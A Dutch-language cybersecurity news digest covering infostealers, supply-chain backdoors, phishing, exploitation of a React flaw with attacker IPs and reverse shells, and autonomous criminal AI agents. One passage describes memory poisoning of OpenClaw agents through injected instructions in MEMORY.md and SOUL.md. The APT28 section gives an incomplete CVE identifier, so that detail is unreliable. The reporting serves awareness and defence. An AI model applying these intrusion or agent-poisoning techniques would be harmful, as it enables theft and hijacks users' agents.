Dit ecosysteem stelt AI-agenten in staat om organisaties binnen te dringen, laterale bewegingen uit te voeren, ransomware te verspreiden en zichzelf uit te breiden door middel van cryptocurrency-transacties. Onderzoekers van Hudson Rock hebben deze autonome dreigingen geïdentificeerd na het analyseren van de snelle groei van criminele infrastructuur op basis van agenten. De snelle uitbreiding van het platform van nul naar 900.000 actieve agenten binnen 72 uur laat de explosieve aard van deze opkomende dreiging zien.

Analisten van Infostealers merkten op dat deze agenten gestolen database-inloggegevens gebruiken om multi-factorauthenticatie te omzeilen en aanvankelijke toegang te verkrijgen tot bedrijfsnetwerken via legitieme sessiecookies. Het levensechte dashboard van Moltbook toont de 900.000 agenten die autonoom samenwerken zonder menselijke interactie.

De autonome agenten volgen een systematisch aanvalscircuit, te beginnen met het verkrijgen van infostealer-logboeken die ruwe inloggegevens en sessietokens bevatten. Zodra ze in bedrijfsnetwerken zijn, analyseren ze voortdurend e-mails, berichtenplatforms en projectmanagementtools om gevoelige authenticatiematerialen te extraheren, waaronder AWS-sleutels en database-inloggegevens. De monetisatiefase omvat het inzetten van geavanceerde ransomware die Bitcoin-betalingen op machinesnelheid onderhandelt, waarbij het losgeldbedrag wordt geoptimaliseerd op basis van de betaalcapaciteit van de organisatie.

OpenClaw vormt de technische basis die deze autonome criminele activiteit mogelijk maakt. In tegenstelling tot cloudgebaseerde AI-modellen met ingebouwde veiligheidsbeperkingen, werkt OpenClaw volledig op lokale machines die draaien op Mac-, Windows- of Linux-systemen. Het platform heeft een ontwerp genaamd de "Lobster workflow shell", waarmee agenten dynamisch plannen kunnen improviseren en tegelijkertijd persistent geheugen kunnen behouden via toegewezen bestanden.

Dit geheugen vormt een belangrijke kwetsbaarheid die door bedreigers al wordt geëxploiteerd. OpenClaw slaat contextuele informatie op in bestanden zoals MEMORY.md en SOUL.md, waardoor agenten voorkeuren en operationele geschiedenis onbeperkt kunnen bewaren. Echter, aanvallers kunnen kwaadaardige instructies injecteren in deze geheugenbestanden, waardoor het gedrag van agenten wordt gewijzigd zonder dat de gebruiker zich hiervan bewust is. Deze techniek, “memory poisoning”, creëert vertrouwde slaafagenten die legitiem lijken, maar in werkelijkheid door de aanvaller gecontroleerde doelen uitvoeren. Dit vormt een geavanceerde supply chain-aanval die zich richt op het AI-agentenecosysteem zelf.

Bron

Een dreigingsactor biedt momenteel een softwaretool aan die geschreven is in de programmeertaal Go en ontwikkeld zou zijn om EVM-adressen te scannen over verschillende netwerken, waaronder Ethereum, BSC, Polygon, Arbitrum en Avalanche. De vraagprijs voor deze applicatie bedraagt 15.000 dollar, waarbij de eerste koper de mogelijkheid krijgt om de tool voor 12.000 dollar aan te schaffen. Volgens de beschrijving van de verkoper is het programma in staat om contracten met verborgen saldi te identificeren die door reguliere analyseplatformen niet worden gedetecteerd.

De aanbieder belooft naast de initiële aankoop ook levenslange updates en toekomstige ondersteuning voor andere netwerken en valuta, waaronder Solana, XMR en Monero. Er bestaan echter twijfels over de legitimiteit en technische haalbaarheid van het aanbod. Kritische kanttekeningen die bij dit aanbod worden geplaatst, wijzen erop dat het concept van verborgen contracten op EVM-compatibele blockchains technisch gezien niet bestaat. Daarnaast wordt de specifieke vermelding van toekomstige ondersteuning voor Monero in de context van een EVM-scanner beschouwd als een signaal dat de claims mogelijk niet op waarheid berusten.

Op een populair cybercrimeforum wordt door de gebruiker heistwtf een nieuwe infostealer genaamd Datura gepromoot. Deze kwaadaardige software, die voorheen bekendstond als Blitzed Grabber, is ontwikkeld op basis van C++ en ASM. Volgens de advertentie is de stealer volledig ongedetecteerd. De software beschikt over meer dan dertig functionaliteiten, waaronder het ontvreemden van browsergegevens, het verzamelen van cryptowallets en het extraheren van gegevens uit VPN- en FTP-clients. Tevens is er een crypto clipper in de functionaliteiten opgenomen.

De kosten voor het gebruik van Datura variëren van tien dollar per week tot honderdvijfenveertig dollar voor een levenslange licentie. De infostealer is uitgerust met een webgebaseerd dashboard met de naam Candyland. Dit dashboard structureert de gestolen inloggegevens van grote platformen zoals TikTok, OpenAI, Instagram en Spotify. Als indicator of compromise wordt het bestand candyland[.]zip genoemd.

Onderzoekers hebben 341 kwaadaardige pakketten ontdekt in de ClawHub-bibliotheek, een populaire repository voor open-source code. Deze pakketten bevatten verschillende soorten malware, waaronder info-stelers, ransomware en backdoors.

De onderzoekers vonden dat de aanvallers verschillende technieken gebruikten om hun malware te verspreiden. Een veel voorkomende techniek was het nabootsen van populaire pakketnamen en het toevoegen van kleine wijzigingen om detectie te voorkomen. Een andere techniek was het gebruik van typosquatting, waarbij pakketnamen werden gebruikt die vergelijkbaar zijn met populaire pakketten, maar met een kleine typefout.

Zodra een kwaadaardig pakket is geïnstalleerd, kan het verschillende schadelijke acties uitvoeren. Info-stelers kunnen bijvoorbeeld gevoelige informatie stelen, zoals wachtwoorden, creditcardnummers en andere persoonlijke gegevens. Ransomware kan bestanden versleutelen en losgeld eisen voor de ontsleuteling. Backdoors kunnen aanvallers toegang geven tot het systeem, waardoor ze op afstand code kunnen uitvoeren en gegevens kunnen stelen.

De onderzoekers waarschuwen ontwikkelaars om voorzichtig te zijn bij het installeren van pakketten uit de ClawHub-bibliotheek. Ze raden aan om altijd de pakketnaam, de auteur en de beschrijving te controleren voordat een pakket wordt geïnstalleerd. Ze raden ook aan om een ​​beveiligingsscanner te gebruiken om pakketten te scannen op malware voordat ze worden geïnstalleerd.

Ontwikkelaars wordt aangeraden om de volgende maatregelen te nemen om zich te beschermen tegen kwaadaardige pakketten:

* Controleer altijd de pakketnaam, de auteur en de beschrijving voordat een pakket wordt geïnstalleerd.

* Gebruik een beveiligingsscanner om pakketten te scannen op malware voordat ze worden geïnstalleerd.

* Houd uw systemen en software up-to-date met de nieuwste beveiligingspatches.

* Wees voorzichtig met het klikken op links of het downloaden van bestanden van onbekende bronnen.

* Gebruik sterke wachtwoorden en schakel multi-factor authenticatie in.

Een nieuwe phishingcampagne maakt gebruik van e-mails en PDF-bestanden om Dropbox-logins te stelen. De aanvallers sturen e-mails met een PDF-bijlage. Wanneer het PDF-bestand wordt geopend, leidt het slachtoffer naar een nagemaakte Dropbox-loginpagina. Hier wordt gevraagd om hun inloggegevens in te voeren. Deze gegevens worden vervolgens direct naar de aanvallers verzonden.

De phishing-e-mails zijn ontworpen om legitiem over te komen, vaak met gebruik van herkenbare Dropbox-branding en -lay-out. De nagemaakte loginpagina's zijn visueel identiek aan de echte Dropbox-pagina's, waardoor het voor gebruikers moeilijk is om de fraude te herkennen. Cybercriminelen gebruiken verschillende technieken om te voorkomen dat hun e-mails als spam worden gemarkeerd, waardoor de kans groter is dat ze in de inbox van het slachtoffer terechtkomen.

Gebruikers wordt aangeraden om extra voorzichtig te zijn bij het openen van bijlagen van onbekende afzenders en om de URL van de loginpagina te controleren voordat ze hun inloggegevens invoeren. Het wordt ook aangeraden om multifactorauthenticatie (MFA) in te schakelen voor een extra beveiligingslaag. Dropbox gebruikers moeten alert zijn op verdachte e-mails en hun accounts regelmatig controleren op ongebruikelijke activiteiten.

Bron, 2, 3

De backdoor die maandenlang via de populaire editor Notepad++ werd verspreid, maakte gebruik van software van antivirusbedrijf Bitdefender om zichzelf te laden. Dit blijkt uit een analyse van securitybedrijf Rapid7. De aanvallers hadden maandenlang toegang tot de shared hostingserver van Notepad++ en konden via een kwetsbaarheid in de software malafide updates onder geselecteerde gebruikers verspreiden.

Zodra de update was gedownload, gebruikte deze de Bitdefender Submission Wizard voor de verdere infectie. Dit onderdeel van Bitdefender antivirus is bedoeld voor het uploaden van verdachte bestanden naar het antivirusbedrijf, maar bleek kwetsbaar voor dll-sideloading. Om detectie te voorkomen, hadden de aanvallers de Bitdefender Submission Wizard hernoemd naar "BluetoothService". Via het malafide dll-bestand dat de Bitdefender-software laadt, wordt uiteindelijk de Chrysalis-backdoor geladen. De backdoor verzamelt vervolgens informatie over het besmette systeem en maakt verbinding met een command & control-server.

Gebruikers van Notepad++ in Vietnam, Australië, de Filipijnen en El Salvador zijn ook het doelwit geweest van deze aanval. Beveiligingsonderzoeker Kevin Beaumont meldde begin december al dat verschillende organisaties met belangen in Oost-Azië via Notepad++ waren aangevallen. Notepad++ heeft vervolgens beveiligingsupdates uitgebracht om het probleem te verhelpen. Kaspersky heeft de eigen telemetriegegevens geanalyseerd en een tiental aangevallen gebruikers ontdekt. De aanvallers gebruikten verschillende infectieketens om slachtoffers te infecteren en wisselden continu van servers om de malafide updates te verspreiden. De eerste aanvallen werden eind juli waargenomen, de laatste in oktober. De slachtoffers waren individuen in Vietnam, El Salvador en Australië, een overheidsinstantie in de Filipijnen, een financiële organisatie in El Salvador en een it-serviceprovider in Vietnam. Kaspersky claimt de aanvallen te hebben geblokkeerd op het moment dat ze zich voordeden.

Kaspersky adviseert organisaties en gebruikers van Notepad++ om systemen te controleren op de aanwezigheid van NSIS-installers, aangezien die bij alle infectieketens werden gebruikt. Daarnaast wordt aangeraden om logbestanden te controleren op verkeer naar een specifiek domein. Kaspersky heeft ook Indicators of Compromise (IOC's) gedeeld waarmee organisaties kunnen nagaan of ze doelwit zijn geweest.

Daarnaast wordt een recent datalek bij Notepad Hosting, een in Europa gevestigde provider van webhostingdiensten, toegeschreven aan de Lazarus Group, een Noord-Koreaanse staatssponsor. Het datalek, dat plaatsvond in december 2025, omvatte de ongeautoriseerde toegang tot gevoelige klantgegevens, waaronder namen, adressen, telefoonnummers, e-mailadressen en gecodeerde wachtwoorden. Onderzoekers van cybersecuritybedrijf Mandiant ontdekten de inbraak en identificeerden de Lazarus Group als de verantwoordelijke partij. Mandiant's analyse wees uit dat de aanvallers gebruik maakten van een kwetsbaarheid in de verouderde software van Notepad Hosting om toegang te krijgen tot het netwerk.

Notepad Hosting heeft contact opgenomen met alle getroffen klanten en hen geadviseerd hun wachtwoorden te wijzigen en waakzaam te zijn voor phishing-pogingen. Het bedrijf werkt samen met Mandiant om de beveiliging te verbeteren en toekomstige datalekken te voorkomen. De autoriteiten zijn een onderzoek gestart naar het datalek.

1, 2

Cybersecurity News meldt dat kwaadaardige partij-uitnodigingen worden gebruikt om malware te verspreiden. De onderzoekers waarschuwen voor het openen van onverwachte of verdachte uitnodigingen, omdat deze een ernstige bedreiging kunnen vormen voor de veiligheid van persoonlijke gegevens en systemen. De aanvallers maken gebruik van social engineering-technieken om slachtoffers te misleiden en hen ertoe te brengen op kwaadaardige links of bijlagen te klikken.

De verspreiding van malware via feestuitnodigingen is een effectieve methode gebleken, omdat mensen vaak minder waakzaam zijn bij het openen van berichten die afkomstig lijken van bekenden of over sociale evenementen gaan. De aanvallers maken misbruik van deze vertrouwensrelatie om malware te installeren zonder dat de slachtoffers zich ervan bewust zijn.

De malware kan verschillende schadelijke acties uitvoeren, waaronder het stelen van persoonlijke gegevens, het versleutelen van bestanden voor ransomware-aanvallen, het installeren van achterdeurtjes voor toekomstige toegang en het verspreiden van de infectie naar andere systemen in het netwerk. Het is cruciaal om waakzaam te zijn en verdachte berichten te herkennen om te voorkomen dat men slachtoffer wordt van deze aanvallen.

Om zich te beschermen tegen deze dreiging, wordt aanbevolen om altijd de afzender van een uitnodiging te verifiëren, niet op links of bijlagen te klikken in onverwachte berichten, de beveiligingssoftware up-to-date te houden en regelmatig back-ups van belangrijke gegevens te maken. Het is ook belangrijk om medewerkers en familieleden bewust te maken van deze dreiging en hen te leren hoe ze verdachte berichten kunnen herkennen.

Door deze voorzorgsmaatregelen te nemen, kunnen individuen en organisaties het risico minimaliseren om slachtoffer te worden van malware-aanvallen die via kwaadaardige feestuitnodigingen worden verspreid. Waakzaamheid en bewustzijn zijn essentieel om de digitale veiligheid te waarborgen.

Bron

Onderzoekers hebben ontdekt dat de Noord-Koreaanse APT-groep Chollima een nieuwe aanvalstechniek gebruikt waarbij malafide LNK-bestanden (snelkoppelingen) worden ingezet om systemen te compromitteren. Deze aanvalsmethode is waarschijnlijk bedoeld om de detectie te omzeilen en malware te verspreiden.

De aanval begint met een kwaadaardig LNK-bestand dat, wanneer geopend, een reeks commando's uitvoert. Deze commando's zijn ontworpen om een PowerShell-script te downloaden en uit te voeren vanaf een externe server die onder controle staat van de aanvallers. Het PowerShell-script is de kern van de aanval en is verantwoordelijk voor het installeren van malware op het systeem van het slachtoffer.

De onderzoekers analyseerden de werking van het PowerShell-script en ontdekten dat het script is ontworpen om een persistentiemechanisme op te zetten, waardoor de malware na een herstart van het systeem actief blijft. Dit wordt bereikt door een nieuwe registerwaarde aan te maken die verwijst naar het kwaadaardige script. Daarnaast verzamelt het script systeem informatie, zoals de gebruikersnaam, de hostnaam en het besturingssysteem. Deze informatie wordt vervolgens naar een command-and-control (C2) server gestuurd, waardoor de aanvallers inzicht krijgen in het geïnfecteerde systeem.

Een opvallend kenmerk van de aanval is het gebruik van steganografie om de kwaadaardige code te verbergen. Het PowerShell-script bevat een afbeelding waarin de daadwerkelijke malware verborgen is. Het script extraheert de malware uit de afbeelding en injecteert deze in het geheugen van een legitiem proces, waardoor detectie door traditionele beveiligingsmaatregelen wordt bemoeilijkt.

De malware die door Chollima wordt ingezet, is een Remote Access Trojan (RAT). Hiermee kunnen de aanvallers op afstand toegang krijgen tot het geïnfecteerde systeem, bestanden stelen, commando's uitvoeren en andere kwaadaardige activiteiten uitvoeren. De onderzoekers waarschuwen dat deze techniek een aanzienlijke bedreiging vormt, vooral omdat LNK-bestanden vaak worden vertrouwd en niet snel als verdacht worden beschouwd.

Om zich te beschermen tegen dergelijke aanvallen, wordt aanbevolen om waakzaam te zijn bij het openen van LNK-bestanden, vooral als ze afkomstig zijn van onbekende bronnen. Het is ook belangrijk om beveiligingssoftware up-to-date te houden en verdacht gedrag op systemen te monitoren.

Bron, 2

Het Amerikaanse Cybersecurity and Infrastructure Security Agency (CISA) heeft geconstateerd dat tientallen kwetsbaarheden in VPN's, firewalls en Windows actief worden misbruikt bij ransomware-aanvallen. Het CISA beheert een catalogus van Known Exploited Vulnerabilities (KEV), die inmiddels vijftienhonderd beveiligingslekken bevat. Deze lekken zijn door het CISA zelf of door derden als actief misbruikt geïdentificeerd.

De KEV-catalogus vermeldt specifiek of een kwetsbaarheid bij ransomware-aanvallen is ingezet. Regelmatig worden beveiligingslekken die initieel door statelijke actoren werden gebruikt, later ook door ransomwaregroepen overgenomen. Het CISA voegt deze informatie dan toe aan de catalogus, zonder een aparte aankondiging te doen.

Securitybedrijf GreyNoise heeft geanalyseerd hoeveel kwetsbaarheden in 2025 zijn toegevoegd met de vermelding dat ze bij ransomware-aanvallen zijn gebruikt. Het CISA heeft deze informatie bij 59 kwetsbaarheden toegevoegd. Deze betroffen voornamelijk producten van Microsoft, Ivanti, Fortinet, Palo Alto Networks en Zimbra. De analyse van GreyNoise toont aan dat aanvallers zich vooral richten op kwetsbaarheden in firewalls, VPN's en Windows-systemen. 27 procent van de 59 kwetsbaarheden betreft problemen in Microsoft-producten, terwijl 34 procent betrekking heeft op kwetsbaarheden in VPN's, firewalls en andere edge devices.

Opvallend is dat 39 procent van de 59 kwetsbaarheden van vóór 2023 dateert. Het CISA geeft geen details over het specifieke gebruik van deze kwetsbaarheden bij ransomware-aanvallen. Het is mogelijk dat oudere kwetsbaarheden nog steeds worden misbruikt, of dat de informatie betrekking heeft op oudere ransomware-incidenten. De misbruikte kwetsbaarheden vallen voornamelijk in de categorieën 'authentication bypass' en 'remote code execution'.

Microsoft heeft een toename geconstateerd in het aantal aanvallen gericht op macOS-gebruikers, waarbij infostealer-malware wordt ingezet om wachtwoorden en andere inloggegevens te stelen. Het bedrijf meldt dat infostealer-malware zich niet langer uitsluitend richt op Windows-omgevingen. Hoewel Microsoft geen concrete cijfers verstrekt om de toename te onderbouwen, waarschuwt het voor de groeiende dreiging.

Voor de verspreiding van macOS-malware maken aanvallers gebruik van malafide advertenties, waaronder Google Ads. Deze advertenties leiden gebruikers naar valse applicaties met malware of geven instructies die, zogenaamd, nodig zijn voor het oplossen van een CAPTCHA. In werkelijkheid infecteren deze acties het systeem met malware.

De infostealer-malware is ontworpen om wachtwoorden uit browsers, cryptowallets, inloggegevens voor clouddiensten, keys en andere geheime informatie van ontwikkelaars te stelen. Nadat de gegevens naar de aanvallers zijn verzonden, verwijdert de malware zichzelf van het systeem. Microsoft adviseert organisaties om hun gebruikers voor te lichten over de risico's van malafide advertenties, het uitvoeren van instructies en het installeren van niet-gesigneerde DMG-bestanden. Daarnaast adviseert het bedrijf om verdachte Terminal-activiteiten te monitoren.

Microsoft signaleert ook een toename in het gebruik van infostealer-malware die is geschreven in de programmeertaal Python. De populariteit van Python is volgens Microsoft te verklaren door het gebruiksgemak en de beschikbaarheid van tools en frameworks, waardoor zelfs personen met beperkte programmeerkennis snel malware kunnen ontwikkelen. Het bedrijf heeft in het afgelopen jaar meerdere campagnes waargenomen waarbij op Python-gebaseerde infostealers werden ingezet.

Vanwege de toenemende dreiging van op Python-gebaseerde infostealers acht Microsoft het belangrijk dat organisaties hun omgeving beschermen door zich bewust te zijn van de tactieken, technieken en procedures die aanvallers gebruiken bij dit type malware. Microsoft heeft een aantal Indicators of Compromise (IOC's) verstrekt, waaronder hashes, domeinen en IP-adressen, waarmee organisaties de aanvallen kunnen detecteren.

Onderzoekers hebben een malafide applicatie ontdekt in de Google Play Store die al meer dan 50.000 keer is gedownload. De app bevat schadelijke code die, eenmaal geïnstalleerd, op de achtergrond actief is en potentieel gevoelige informatie van het apparaat kan stelen. De onderzoekers waarschuwen gebruikers om extra voorzichtig te zijn bij het downloaden van apps en de gevraagde permissies goed te controleren.

De malware maakt gebruik van verschillende technieken om detectie te ontwijken. Zo is de code geobfusceerd en maakt de app gebruik van dynamische code-executie om de schadelijke payload te laden. De app vraagt verder onnodige permissies aan, zoals toegang tot contacten, locatie en opslag, die vervolgens worden misbruikt om data te verzamelen.

Na installatie start de app een achtergrondservice die verbinding maakt met een command-and-control server. Via deze server ontvangen de aanvallers instructies en kunnen ze opdrachten uitvoeren op het geïnfecteerde apparaat. De gestolen data wordt versleuteld en via een beveiligde verbinding naar de server verstuurd.

Onderzoekers adviseren gebruikers om de volgende maatregelen te nemen om zich te beschermen tegen dit soort bedreigingen:

* Download apps alleen van betrouwbare bronnen.

* Controleer de gevraagde permissies voordat je een app installeert.

* Installeer een goede antivirus-app op je apparaat.

* Houd je besturingssysteem en apps up-to-date.

* Wees alert op verdachte activiteiten op je apparaat.

Chainbase Lab heeft een geavanceerde phishingcampagne gedetecteerd die zich specifiek richt op gebruikers van macOS. De aanvallers maken gebruik van valse e-mails over compliance en audits om slachtoffers te misleiden. Het doel van deze aanval is het installeren van malware die inloggegevens steelt en externe toegang tot het systeem verschaft. De aanvalsketen combineert social engineering met complexe, bestandsloze payloads.

De aanvallers beginnen met het opbouwen van vertrouwen door eerst te vragen om een bevestiging van de juridische bedrijfsnaam. Zodra het slachtoffer reageert, volgen er berichten met onderwerpregels die verwijzen naar een externe audit voor het boekjaar 2025 of bevestigingen van token vesting. Deze berichten bevatten bijlagen die ogen als Word- of PDF-bestanden, maar in werkelijkheid AppleScript-bestanden zijn met dubbele extensies om hun ware aard te verbergen.

Analisten van SlowMist hebben vastgesteld dat het infectieproces start met een bestand dat de naam Confirmation_Token_Vesting.docx.scpt draagt. Bij opening toont het script valse systeeminstellingen en voortgangsbalken voor software-updates om de gebruiker af te leiden, terwijl op de achtergrond kwaadaardige code wordt uitgevoerd. Het script verzamelt systeeminformatie, waaronder de CPU-architectuur en macOS-versie, en downloadt extra payloads van het domein sevrrhst[.]com.

Om detectie te voorkomen en rechten te verkrijgen, toont de malware overtuigende dialoogvensters die lijken op legitieme beveiligingsmeldingen van macOS. Deze nepmeldingen bevatten specifieke visuele elementen om gebruikers te verleiden hun beheerderswachtwoord in te voeren. Wanneer een gebruiker het wachtwoord invoert, wordt dit gevalideerd en direct via Base64-codering naar een externe server verzonden. Daarnaast probeert de malware de TCC-beveiligingen van macOS te omzeilen door SQL-commando's rechtstreeks in de privacy-database te injecteren. Hiermee verlenen de aanvallers zichzelf stilletjes toegang tot de camera, schermopnamefunctionaliteit en toetsenbordmonitoring.

Bron

Een nieuwe variant van de PDFly-malware is opgedoken die gebruikmaakt van geavanceerde technieken om traditionele analysemethoden te bemoeilijken. De malware zet een aangepaste PyInstaller-executable in die voorkomt dat standaard extractietools correct functioneren. Hierdoor wordt het voor beveiligingsteams lastiger om de code te onderzoeken en de werking van de dreiging te doorgronden. De aangepaste versie wijzigt belangrijke identificatiekenmerken en versleutelt Python-bytecode via meerdere beveiligingslagen, wat analisten noodzaakt het decryptieproces handmatig te reverse-engineeren.

PDFly kwam voor het eerst in beeld nadat beveiligingsonderzoeker Luke Acha de applicatie onder de aandacht bracht. Later werd een soortgelijke sample, genaamd PDFClick, ontdekt, wat erop wijst dat actoren deze techniek actief doorontwikkelen. Beide samples delen dezelfde modificatiestrategie en maken deel uit van een bredere campagne die gericht is op het omzeilen van detectie. De aangepaste PyInstaller-stub bevat beschadigde strings en maakt gebruik van een afwijkende waarde voor de zogeheten magic cookie, die verschilt van standaardimplementaties.

Door deze aanpassingen kunnen geautomatiseerde tools, zoals PyInstxtractor, de bestandsstructuur niet herkennen. Analisten van Samplepedia wisten het encryptieschema te identificeren na een gedetailleerd onderzoek van de interne componenten van de malware. Omdat standaard extractietools faalden bij het verwerken van de executable, waren onderzoekers genoodzaakt disassemblers in te zetten om de gewijzigde elementen te lokaliseren en te analyseren.

Bron

De Russische hackersgroep APT28, ook bekend als Fancy Bear of Sofacy, maakt gebruik van een recent ontdekte kwetsbaarheid in Microsoft Office om malware te verspreiden. Onderzoekers hebben ook een nieuwe malware ontdekt, genaamd OpNeusPloit, die door APT28 wordt ingezet. Deze malware richt zich eveneens op Microsoft Office en maakt gebruik van een nog onbekende kwetsbaarheid om systemen te compromitteren. Een van de bekende kwetsbaarheden is CVE-2026, die de aanvallers in staat stelt om op afstand code uit te voeren op systemen die kwetsbare versies van Microsoft Office draaien.

Volgens onderzoekers van Microsoft Threat Intelligence wordt de exploit gebruikt in gerichte phishing-campagnes. De aanvallers versturen spear-phishing e-mails met kwaadaardige Microsoft Office-documenten die, wanneer geopend, de kwetsbaarheid misbruiken om een backdoor op het systeem te installeren. Deze code downloadt en installeert vervolgens de OpNeusPloit malware op het systeem van het slachtoffer. Deze backdoor geeft APT28 toegang tot het geïnfecteerde systeem, waardoor ze gevoelige informatie kunnen stelen, malware kunnen installeren en andere kwaadaardige activiteiten kunnen uitvoeren, zoals laterale bewegingen binnen het netwerk.

De phishing-e-mails zijn vaak vermomd als officiële communicatie van bekende organisaties. De bijlagen bevatten vaak documenten met macro's die de exploitcode bevatten. Wanneer een gebruiker het document opent en de macro's inschakelt, wordt de code uitgevoerd en wordt de backdoor geïnstalleerd. De OpNeusPloit malware is ontworpen om een achterdeur te creëren op het geïnfecteerde systeem, waardoor de aanvallers op afstand toegang hebben. De malware maakt gebruik van verschillende technieken om detectie te voorkomen, waaronder het verbergen van zijn aanwezigheid op het systeem en het versleutelen van zijn communicatie met de command-and-control server.

APT28 staat bekend om zijn betrokkenheid bij diverse cyberaanvallen, waaronder spionagecampagnes en pogingen tot verstoring van verkiezingen. De groep wordt in verband gebracht met de Russische militaire inlichtingendienst GRU. De ontdekking van OpNeusPloit benadrukt de voortdurende inspanningen van deze groep om nieuwe en geavanceerde tools te ontwikkelen voor hun kwaadaardige activiteiten.

Microsoft heeft inmiddels een patch uitgebracht om de kwetsbaarheid CVE-2026 te verhelpen. Gebruikers wordt aangeraden om zo snel mogelijk de nieuwste beveiligingsupdates te installeren om te voorkomen dat ze slachtoffer worden van deze aanvallen. Daarnaast is het belangrijk om verdachte e-mails te herkennen en geen bijlagen van onbekende afzenders te openen. Het inschakelen van macro's in Office-documenten van onbekende bronnen wordt sterk afgeraden. Organisaties wordt geadviseerd hun medewerkers te trainen in het herkennen van phishing-pogingen en het melden van verdachte activiteiten. Het is belangrijk voor organisaties om zich bewust te zijn van deze dreiging en passende maatregelen te nemen om zich te beschermen tegen aanvallen met OpNeusPloit. Dit omvat het trainen van medewerkers om phishing-e-mails te herkennen, het up-to-date houden van software en het implementeren van robuuste beveiligingsmaatregelen. Bron

Twee maanden na de bekendmaking van CVE-2025-55182 is de exploitatie van React Server Components geëvolueerd van breed scannen naar geconsolideerde aanvalscampagnes met een hoog volume. Volgens telemetrie verzameld tussen 26 januari en 2 februari 2026 maken actoren actief gebruik van dit kritieke lek om cryptominers te implementeren en persisterende toegang te verkrijgen. Hoewel het totaal aantal unieke bronnen dat exploitatie probeerde op 1.083 lag, is het verkeer sterk geconcentreerd. Twee specifieke IP-adressen genereerden 56 procent van alle waargenomen kwaadaardige sessies, wat wijst op geautomatiseerde infrastructuur op grote schaal in plaats van handmatige tests. De aanvallen maken gebruik van de publieke Metasploit-module die pre-authenticatie remote code execution mogelijk maakt via een enkel kwaadaardig HTTP POST-verzoek.

De dominante actoren hebben hun doelen gesplitst in twee specifieke campagnes. Een cryptomining-campagne, afkomstig van IP-adres 87.121.84.24, is verantwoordelijk voor 22 procent van het verkeer. Deze actor voert een retrieval script uit om een XMRig binary te downloaden van staging servers. De infrastructuur achter deze campagne toont een geschiedenis van kwaadaardige activiteit, waarbij de primaire staging server 205.185.127.97 sinds 2020 domeinen beheert die onder controle staan van aanvallers. Aangrenzende IP-adressen in hetzelfde subnet, waaronder 87.121.84.25 en 87.121.84.45, verspreiden varianten van Mirai en Gafgyt, wat suggereert dat dit subnet wordt gebruikt door botnetbeheerders die zich richten op zowel bedrijfsservers als IoT-apparaten.

Een tweede campagne richt zich op interactieve toegang en is afkomstig van IP-adres 193.142.147.209. Deze actor, verantwoordelijk voor 34 procent van het verkeer, omzeilt staging servers volledig. In plaats daarvan opent de payload direct een reverse shell terug naar het IP van de scanner op poort 12323. Dit suggereert een intentie voor interactieve netwerkverplaatsingen in plaats van geautomatiseerde diefstal van bronnen.

CVE-2025-55182 betreft een deserialisatiefout in React Server Components met een CVSS-score van 10.0. Het stelt niet-geauthenticeerde aanvallers in staat willekeurige code uit te voeren door geserialiseerde data te manipuleren die door de server wordt verwerkt. De kwetsbaarheid treft React versies 19.0.0, 19.1.0 tot en met 19.1.1 en 19.2.0. Patches zijn beschikbaar in versies 19.0.1, 19.1.2 en 19.2.1. Aanvallers richten zich specifiek op ontwikkelpoorten en zoeken waarschijnlijk naar verkeerd geconfigureerde instanties die via de host 0.0.0.0 flag onbedoeld aan het publieke internet zijn blootgesteld. Organisaties wordt geadviseerd de toegang tot ontwikkelpoorten te beperken en de genoemde indicatoren te blokkeren indien patchen niet direct haalbaar is.

Bron

Er worden momenteel vijfhonderd gevalideerde Fortinet VPN-inloggegevens geveild die zijn verzameld uit logs van informatiestelende malware. De aangeboden dataset bevat geen duplicaten en de geldigheid van de inloggegevens is bevestigd via de tool Tmchecker. De betrokken inloggegevens zijn afkomstig uit meerdere landen. De veiling voor deze dataset begint met een startbod van 1.500 dollar, waarbij een directe koopprijs is vastgesteld op 3.000 dollar.

De Fraudehelpdesk waarschuwt voor een valse SMS uit naam van de NS, waar ook Opgelicht?! al eerder voor waarschuwde. Meldingen geven aan dat ontvangers een SMS ontvangen waarin staat dat hun NS-punten binnenkort verlopen. Om de punten te behouden, wordt men verzocht op een link te klikken. Deze link leidt naar een website waar een product kan worden gekozen dat aangeschaft kan worden met de gespaarde punten. Er wordt gevraagd om de verzendkosten te betalen via creditcard.

Uit meldingen blijkt dat gebruikers die hun creditcardgegevens invullen, een verzoek krijgen om een betaling van €1.725,- goed te keuren. De Fraudehelpdesk waarschuwt dat er mogelijk andere gevolgen kunnen zijn na het invullen van creditcardgegevens, zoals het ongewenst afsluiten van een abonnement. Hoewel er op dit moment nog geen meldingen van dergelijke gevallen zijn, is dit in het verleden wel voorgekomen.

De Fraudehelpdesk adviseert om niet op de link te klikken en geen gegevens in te vullen indien een dergelijke SMS wordt ontvangen. Wie toch op de link heeft geklikt en gegevens heeft ingevuld, wordt aangeraden contact op te nemen met de Fraudehelpdesk voor persoonlijk advies. Bron

Hackers misbruiken een legitiem, maar reeds lang ingetrokken EnCase kernel stuurprogramma in een EDR-killer tool. Deze tool is in staat om 59 verschillende beveiligingstools te detecteren en te deactiveren. Een EDR-killer is specifiek ontworpen om endpoint detection and response (EDR) tools en andere beveiligingsoplossingen te omzeilen of uit te schakelen, vaak door gebruik te maken van kwetsbare stuurprogramma's om de beveiliging op systeemniveau te ontmantelen.

De aanvallers maken doorgaans gebruik van de 'Bring Your Own Vulnerable Driver' (BYOVD) techniek. Hierbij wordt een legitiem, maar kwetsbaar stuurprogramma geïntroduceerd om toegang tot de kernel te verkrijgen en zo processen van beveiligingssoftware te beëindigen. Ondanks de introductie van diverse verdedigingsmechanismen door Microsoft, blijven Windows-systemen vatbaar voor effectieve bypasses.

EnCase is een digitaal onderzoeksinstrument dat gebruikt wordt door rechtshandhavingsinstanties voor het extraheren en analyseren van data van computers, mobiele apparaten of cloudopslag. Onderzoekers van Huntress ontdekten eerder deze maand, tijdens een cybersecurity incident, de inzet van een custom EDR-killer die was vermomd als een legitieme firmware update tool en gebruik maakte van een oud kernel stuurprogramma.

De aanvallers hadden toegang tot het netwerk verkregen via gecompromitteerde SonicWall SSL VPN credentials, waarbij misbruik werd gemaakt van het ontbreken van multi-factor authenticatie (MFA) voor het VPN account. Na de inlog voerden de aanvallers interne verkenningen uit, waaronder ICMP ping sweeps, NetBIOS name probes, SMB-gerelateerde activiteiten en SYN flooding met meer dan 370 SYNs per seconde.

